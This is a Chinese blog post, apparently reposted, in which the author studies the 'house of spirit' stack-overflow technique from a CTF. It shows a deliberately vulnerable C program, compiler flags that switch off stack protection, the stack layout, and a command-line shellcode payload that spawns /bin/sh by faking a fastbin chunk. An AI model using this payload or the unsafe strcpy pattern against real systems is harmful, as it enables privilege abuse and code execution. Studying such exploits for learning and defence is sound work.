【溢出利用技巧】house of spirit friendly stack overflow

學習了一下L-CTF中介紹的一個棧溢出利用技巧，記錄一下。

樣例代碼如下：

<code>/*</code>

<code> </code><code>* blackngel's vulnerable program slightly modified by gb_master</code>

<code> </code><code>*/</code>

<code>#include &lt;stdio.h&gt;</code>

<code>#include &lt;string.h&gt;</code>

<code>#include &lt;stdlib.h&gt;</code>

<code>void</code> <code>fvuln(</code><code>char</code> <code>*str1, </code><code>int</code> <code>age)</code>

<code>{</code>

<code>  </code><code>char</code> <code>*ptr1, name[32];</code>

<code>  </code><code>int</code> <code>local_age;</code>

<code>  </code><code>char</code> <code>*ptr2;</code>

<code>  </code><code>local_age = age;</code>

<code>  </code><code>ptr1 = (</code><code>char</code> <code>*) </code><code>malloc</code><code>(256);</code>

<code>  </code><code>printf</code><code>(</code><code>"\nPTR1 = [ %p ]"</code><code>, ptr1);</code>

<code>  </code><code>strcpy</code><code>(name, str1);</code>

<code>  </code><code>printf</code><code>(</code><code>"\nPTR1 = [ %p ]\n"</code><code>, ptr1);</code>

<code>  </code><code>free</code><code>(ptr1);</code>

<code>  </code><code>ptr2 = (</code><code>char</code> <code>*) </code><code>malloc</code><code>(40);</code>

<code>  </code><code>snprintf(ptr2, 40-1, </code><code>"%s is %d years old"</code><code>, name, local_age);</code>

<code>  </code><code>printf</code><code>(</code><code>"\n%s\n"</code><code>, ptr2);</code>

<code>}</code>

<code>int</code> <code>main(</code><code>int</code> <code>argc, </code><code>char</code> <code>*argv[])</code>

<code>  </code><code>int</code> <code>pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};</code>

<code>  </code><code>if</code> <code>(argc == 3)</code>

<code>    </code><code>fvuln(argv[1], </code><code>atoi</code><code>(argv[2]));</code>

<code>  </code><code>return</code> <code>0;</code>

編譯指令如下：

<code>gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos</code>

Ubuntu 14 Server裡編譯需要安裝一下開發包，否則會報錯sys/cdefs.h檔案找不到:

<code>sudo</code> <code>apt-get </code><code>install</code> <code>libc6-dev-i386</code>

這裡關鍵思路是：通過溢出修改局部變量的位址為棧中的一個位址，将僞造位址中的size字段設定成一個fastbin的有效大小，以便能成功将其free，後面的malloc将把此塊記憶體重新申請并使用，snprintf函數再向其中寫入資料，進而可以覆寫函數傳回位址，最終getshell。

局部變量的記憶體分布如下：

<code>0xffffd03c     name</code>

<code>0xffffd05c     ptr2</code>

<code>0xffffd060     ptr1</code>

<code>0xffffd064     local_age</code>

樣例測試指令如下：

<code>.</code><code>/hos</code> <code>`python -c </code><code>'import sys; sys.stdout.write("\x31\xc0\xeb\x14\x44\xd0\xff\xff\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80\x90" + "\x01\x01\x01\x68\xd0\xFF\xFF" + "\x30")'</code><code>` 48</code>

這裡有點問題，通過GDB調試可以getshell，直接執行則報段錯誤：

<a href="http://s5.51cto.com/wyfs02/M02/88/7C/wKiom1f5oKrwldGtAAEhnF722jI013.png" target="_blank"></a>

<a href="http://s1.51cto.com/wyfs02/M01/88/79/wKioL1f5oKvyqjfnAAGPkvPhF5k550.png" target="_blank"></a>

本文轉自fatshi51CTO部落格，原文連結：http://blog.51cto.com/duallay/1859677 ，如需轉載請自行聯系原作者